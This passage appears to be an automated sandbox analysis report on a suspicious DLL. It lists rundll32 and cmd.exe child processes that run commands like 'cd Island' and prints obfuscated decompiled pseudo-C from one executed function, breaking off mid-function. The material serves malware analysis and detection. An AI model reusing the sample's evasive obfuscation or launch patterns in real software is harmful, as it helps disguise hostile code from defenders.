MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4132 Parent PID: 4308

General

Start time:	08:13:30
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6164 Parent PID: 2964

General

Start time:	08:13:32
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Mindlake
Imagebase:	0x1190000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6176 Parent PID: 6164

General

Start time:	08:13:34
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6188 Parent PID: 6176

General

Start time:	08:13:34
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6224 Parent PID: 2964

General

Start time:	08:13:37
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Porthigh
Imagebase:	0x1190000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6236 Parent PID: 6164

General

Start time:	08:13:37
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6248 Parent PID: 6224

General

Start time:	08:13:37
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6260 Parent PID: 6236

General

Start time:	08:13:37
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6268 Parent PID: 6248

General

Start time:	08:13:38
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6336 Parent PID: 2964

General

Start time:	08:13:40
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,Problemscale
Imagebase:	0x1190000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6348 Parent PID: 6224

General

Start time:	08:13:40
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6368 Parent PID: 6348

General

Start time:	08:13:42
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 6580 Parent PID: 2964

General

Start time:	08:13:46
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\CJxeLKU314.dll,WingGrass
Imagebase:	0x1190000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6600 Parent PID: 6336

General

Start time:	08:13:46
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6636 Parent PID: 6600

General

Start time:	08:13:48
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6648 Parent PID: 6580

General

Start time:	08:13:48
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6684 Parent PID: 6648

General

Start time:	08:13:49
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6704 Parent PID: 2964

General

Start time:	08:13:50
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Island
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6740 Parent PID: 6336

General

Start time:	08:13:53
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6804 Parent PID: 6740

General

Start time:	08:13:55
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6832 Parent PID: 6580

General

Start time:	08:13:55
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: cmd.exe PID: 6840 Parent PID: 2964

General

Start time:	08:13:55
Start date:	09/05/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c cd Matter m
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: conhost.exe PID: 6868 Parent PID: 6832

General

Start time:	08:13:56
Start date:	09/05/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7ecfc0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 2964 Parent PID: 5704 loaddll32.exeCOMMON

Executed Functions

Function 6DDD1285, Relevance: 44.3, APIs: 3, Strings: 22, Instructions: 597
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDD1285(void* __ebx, void* __edi, void* __esi) {
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t133;
				void* _t135;
				int _t139;
				signed int _t142;
				signed int _t146;
				void* _t149;
				signed int _t151;
				signed int _t153;
				void* _t155;
				signed int _t156;
				void* _t164;
				signed int _t168;
				void* _t169;
				signed int _t171;
				void* _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t188;
				signed int _t190;
				signed int _t191;
				signed short* _t193;
				signed int _t195;
				void* _t197;
				signed int _t201;
				signed int _t202;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t216;
				signed int _t222;
				void* _t229;
				signed int _t242;
				signed int _t245;
				signed int _t256;
				signed int _t261;
				signed int _t262;
				signed int _t263;
				signed int _t268;
				void* _t270;
				signed int _t272;
				signed int _t277;
				void* _t281;
				signed int _t282;
				signed int _t286;
				signed int* _t287;
				signed int _t291;
				signed int _t294;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t300;
				void* _t301;
				intOrPtr* _t303;
				signed int _t305;
				signed int _t306;
				signed int _t315;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t324;
				signed int _t327;
				signed int _t329;
				signed int _t331;
				signed int _t333;
				signed int _t336;
				signed int _t340;
				signed int _t342;
				signed short _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t354;
				signed int _t358;
				signed short* _t360;
				signed int _t362;
				signed int _t364;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t375;
				signed int _t380;
				signed int _t381;
				signed int _t382;
				signed int _t383;
				signed int _t386;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				signed int _t396;
				void* _t400;
				void* _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t405;
				void* _t411;
				intOrPtr _t412;
				void* _t417;
				void* _t418;
				void* _t419;
				void* _t422;
				intOrPtr _t423;
				intOrPtr _t426;
				void* _t427;
				void* _t428;
				void* _t434;
				intOrPtr _t435;
				void* _t446;
				void* _t450;
				signed int _t451;
				void* _t452;
				void* _t453;
				void* _t456;

				_t260 = __ebx;
				E6DDF00AC(0x6de37e6f, __ebx, __edi, __esi, 0x2c);
				_t324 =  *0x6de95a90; // 0x24cf135
				_t127 =  *0x6de959d0; // 0x235275de
				_t261 =  *0x6de959d8; // 0xeee690d4
				_t380 =  *0x6de959dc; // 0x5
				_t358 =  *0x6de95a00; // 0xb405fe4
				_t405 = 0 - _t380;
				_t327 =  *0x6de95a90; // 0x24cf135
				 *(_t400 - 0x18) = _t127 + _t324 + 0x31f;
				_t129 = _t261;
				 *(_t400 - 0x2c) = _t129;
				 *(_t400 - 0x1c) = _t380;
				if(_t405 >= 0 && (_t405 > 0 || _t358 >= _t129)) {
					_push(0);
					_t358 = _t358 - _t129 * 0x3d + 0xfffffd1c;
					 *0x6de95a58 =  *0x6de95a58 + 0xfffffd1c;
					 *0x6de95a00 = _t358;
					asm("adc dword [0x6de95a5c], 0xffffffff");
					_t380 = 0;
					asm("sbb esi, [ebp-0x1c]");
					_t261 = _t358 -  *(_t400 - 0x2c) + 0x2e4;
					 *0x6de959d8 = _t261;
					asm("adc esi, eax");
					 *0x6de959dc = 0;
				}
				 *(_t400 - 0x28) =  *0x6de959e6 & 0x0000ffff;
				_t131 = 0x6de959e6;
				 *(_t400 - 0x2c) = 0x6de959e6;
				 *(_t400 - 0x1c) = 0x6de959e6;
				do {
					if(_t358 ==  *(_t400 - 0x28)) {
						goto L8;
					} else {
						asm("cdq");
						_t133 = E6DDF01E0( *_t131 & 0x0000ffff, _t327, _t261, _t380);
						_t380 = _t327;
						_t261 = _t133;
						_t327 = _t358 + 5 + _t261;
						 *0x6de959d8 = _t261;
						 *0x6de959dc = _t380;
						 *0x6de95a90 = _t327;
						if(_t327 != ( *0x6de959f0 & 0x0000ffff)) {
							_t131 =  *(_t400 - 0x1c);
							goto L8;
						}
					}
					break;
					L8:
					_t131 = _t131 + 2;
					 *(_t400 - 0x1c) = _t131;
				} while (_t131 < 0x6de95a44);
				_t135 = 6;
				_t411 =  *0x6de95a98 - _t135; // 0x6de3e664
				if(_t411 != 0) {
					L12:
					_t262 = _t261 - 0x27 +  *(_t400 - 0x18) * 0x3d;
					__eflags = _t262;
					 *0x6de959d8 = _t262;
					_t263 =  *(_t400 - 0x18);
					asm("sbb esi, edi");
					 *0x6de959dc = _t380;
				} else {
					_t412 =  *0x6de95a9c; // 0x0
					if(_t412 != 0) {
						goto L12;
					} else {
						_t263 = _t261 + 0x11e05;
					}
				}
				 *0x6de959d0 = _t263 - _t327 * 0x3d - 0x2e4;
				_t139 = GetSystemDirectoryA("C:\Windows\system32", 0x56d);
				_t381 =  *0x6de95a00; // 0xb405fe4
				_t266 = _t139;
				_t329 = 0;
				_t360 = 0x6de959e6;
				 *0x6de95a90 = _t139 -  *0x6de95a90 +  *0x6de959d0;
				_t142 =  *0x6de959e6 & 0x0000ffff;
				 *0x6de959d8 = _t139;
				 *(_t400 - 0x1c) = 0;
				 *0x6de959dc = 0;
				do {
					if(_t381 == _t142) {
						goto L17;
					} else {
						asm("cdq");
						_t266 = E6DDF01E0( *_t360 & 0x0000ffff, _t329, _t266,  *(_t400 - 0x1c));
						_t256 = _t329;
						 *0x6de959d8 = _t266;
						 *(_t400 - 0x1c) = _t256;
						_t381 = _t381 + 5 + _t266;
						 *0x6de959dc = _t256;
						 *0x6de95a90 = _t381;
						if(_t381 != ( *0x6de959f0 & 0x0000ffff)) {
							_t381 =  *0x6de95a00; // 0xb405fe4
							_t142 =  *0x6de959e6 & 0x0000ffff;
							goto L17;
						}
					}
					break;
					L17:
					_t360 =  &(_t360[1]);
				} while (_t360 < 0x6de95a44);
				 *0x6de959d0 = E6DDD0D32();
				GetTempPathA(0x56d, "C:\Users\alfons\AppData\Local\Temp\");
				_t417 =  *0x6de95a04 - 0x1b47; // 0x0
				if(_t417 == 0) {
					_t318 =  *0x6de95a90; // 0x24cf135
					_t319 = _t318 + ( *0x6de959e6 & 0x0000ffff);
					 *0x6de95a90 = _t319;
					_push(0);
					_t320 =  *0x6de959d8; // 0xeee690d4
					asm("adc [0x6de959dc], eax");
					 *0x6de959d8 = _t320 + 0x3b + _t319 * 2;
				}
				_t146 = E6DDD0D32();
				_t402 = _t401 - 0x10;
				 *0x6de959d0 = _t146;
				_t268 = _t402;
				 *(_t400 - 0x34) = _t402;
				_t330 = "6265";
				 *_t268 = 0;
				 *((intOrPtr*)(_t268 + 8)) = 0;
				 *((intOrPtr*)(_t268 + 0xc)) = 0;
				E6DDD5DAB(_t268, "6265");
				_push("Had s");
				 *(_t400 - 4) = 0;
				_t149 = E6DDD4197(_t260, "6265", 0, _t381);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6DDD1E10(_t149);
				_t270 = 6;
				_t418 =  *0x6de95a02 - _t270; // 0xb40
				if(_t418 == 0) {
					_t151 =  *0x6de959d8; // 0xeee690d4
					_t153 = _t151 + 0x11dde +  *0x6de959d0;
					__eflags = _t153;
					 *0x6de95a90 = _t153;
				} else {
					_t315 =  *0x6de959d8; // 0xeee690d4
					 *0x6de959d0 =  *0x6de959d0 +  ~_t315 -  *0x6de95a90 * 0x3d;
				}
				_push("cd Island"); // executed
				E6DE1179F(_t260, _t330, 0, _t381);
				_t382 =  *0x6de959d0; // 0x235275de
				_t155 = 6;
				_t25 = _t382 - 0x338; // 0x235272a6
				_t272 = _t25;
				 *0x6de95a90 = _t272;
				_t419 =  *0x6de95a02 - _t155; // 0xb40
				if(_t419 == 0) {
					_t331 =  *0x6de95a00; // 0xb405fe4
					_t156 = 0;
					 *0x6de959dc = 0;
					_t333 = _t331 + 0x11dde + _t272;
					__eflags = _t333;
					 *0x6de959d8 = _t333;
				} else {
					_t333 =  *0x6de959d8; // 0xeee690d4
					_t156 =  *0x6de959dc; // 0x5
					 *0x6de95a90 = _t272 - _t333 * 0x3d -  *0x6de95a00;
				}
				_push(_t156);
				_push(_t333);
				_push(_t382);
				E6DDD4401(_t260, E6DDD4401(_t260, E6DDD1FF2(_t260, E6DDD20D9(_t260, E6DDD4267(_t260, 0, _t382, _t419), _t333, 0, _t382), _t333, 0, _t382), 0x6de98150, 0, _t382, _t419), "part ", 0, _t382, _t419);
				_t336 =  *0x6de95a00; // 0xb405fe4
				_t277 = 0x6de95a0e;
				_t362 =  *0x6de959dc; // 0x5
				_t383 =  *0x6de959d8; // 0xeee690d4
				do {
					if(_t336 != ( *0x6de959e2 & 0x0000ffff)) {
						 *_t277 =  *_t277 + _t336;
						_t26 = _t336 + 5; // 0xb405fe9
						_t245 = _t26 + _t383;
						 *0x6de95a90 = _t245;
						_t383 = _t383 + _t245 + 0x3b + _t336;
						_push(0);
						asm("adc edi, eax");
					}
					_t277 = _t277 - 4;
				} while (_t277 > 0x6de959e2);
				_push("cd Matter m");
				 *0x6de959d8 = _t383;
				 *0x6de959dc = _t362; // executed
				E6DE1179F(_t260, _t336, _t362, _t383); // executed
				_t164 = 6;
				_t422 =  *0x6de95a98 - _t164; // 0x6de3e664
				if(_t422 != 0) {
					L34:
					 *0x6de959d8 =  *0x6de959d8 - 0x27 +  *0x6de959d0 * 0x3d;
					asm("sbb [0x6de959dc], ecx");
				} else {
					_t423 =  *0x6de95a9c; // 0x0
					if(_t423 != 0) {
						goto L34;
					} else {
						_t242 =  *0x6de959d8; // 0xeee690d4
						 *0x6de959d0 = _t242 + 0x11e05;
					}
				}
				_t403 = _t402 - 0x10;
				 *(_t400 - 0x34) = _t403;
				 *0x6de95a90 =  *0x6de95a90 * 0x29266b;
				_t168 = _t403;
				 *_t168 = 5;
				 *((intOrPtr*)(_t168 + 8)) = 0x5c7;
				 *((intOrPtr*)(_t168 + 0xc)) = 0;
				_push("Molecul");
				 *(_t400 - 4) = 1;
				_t169 = E6DDD4197(_t260, _t336, _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6DDD1E10(_t169);
				_t281 = 0x27;
				_t171 = E6DDD0EF6(_t281);
				_t404 = _t403 - 0x10;
				 *0x6de959d8 = _t171;
				_t282 = _t404;
				 *(_t400 - 0x34) = _t404;
				 *0x6de959dc = 0;
				 *_t282 = 0;
				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6DDD5DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6DDD4197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6DDD1E10(_t174);
				_t176 =  *0x6de959dc; // 0x5
				 *(_t400 - 0x18) =  *0x6de959d8 * 0x36 +  *0x6de95a90;
				_t286 =  *0x6de95a90 * 0x10e1d;
				_t178 =  *0x6de959d8; // 0xeee690d4
				_t287 = 0x6de95a28;
				 *0x6de959d8 = _t178 * _t286;
				_t340 =  *0x6de95a90; // 0x24cf135
				_t180 =  *0x6de959d0; // 0x235275de
				 *0x6de959dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6de95a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6de959dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6de959d8 = _t184;
						_t427 = _t184 -  *0x6de95a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6de95a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
						_t426 =  *0x6de95a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6DDD0D32();
				_t364 =  *0x6de95a90; // 0x24cf135
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6de959dc; // 0x5
				_t188 =  *0x6de959d8; // 0xeee690d4
				_t190 =  *0x6de959f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6de959e6; // 0xb945
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6de959e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6de959e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6DDF01E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6de95a90 = _t364;
						if(_t364 != ( *0x6de959f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6de95a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6de95a98 - _t197; // 0x6de3e664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6de95a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6de959e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6de95a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6de95a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6de959d8 = _t297;
				 *0x6de959dc = _t346;
				do {
					if(_t393 != ( *0x6de959e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // 0xb3f420b
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6de95a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // 0xb3f4241
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6de959d8 = _t297;
						 *0x6de959dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6de959e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6de959e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6de959e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6de95a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6de959f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6de959e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6de95a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6de959d0 = _t105 + _t347;
				_t213 = E6DDD1029(_t394);
				_t300 =  *0x6de95a90; // 0x24cf135
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6de95a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6de959f2 =  *0x6de959f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6de959d0 = _t371;
				_t446 =  *0x6de95a04 - 0x1b47; // 0x0
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6de959e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6de959d8 = _t349;
					 *0x6de959dc =  *(_t400 - 0x14);
					_t371 =  *0x6de959d0; // 0x235275de
				}
				_t395 = 0x6de95a0e;
				do {
					if(_t300 != ( *0x6de959e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6de959e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6de959d0 = _t371;
				_t450 =  *0x6de95a02 - _t301; // 0xb40
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6de959d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6de95a90 = _t117 + _t349 * 2;
				E6DDCFB4A(_t396, _t451);
				_t350 =  *0x6de95a00; // 0xb405fe4
				_t303 = 0x6de95ac8;
				_t372 =  *0x6de959d8; // 0xeee690d4
				do {
					_t452 = _t396 -  *0x6de95a18; // 0x4c
					if(_t452 != 0) {
						L80:
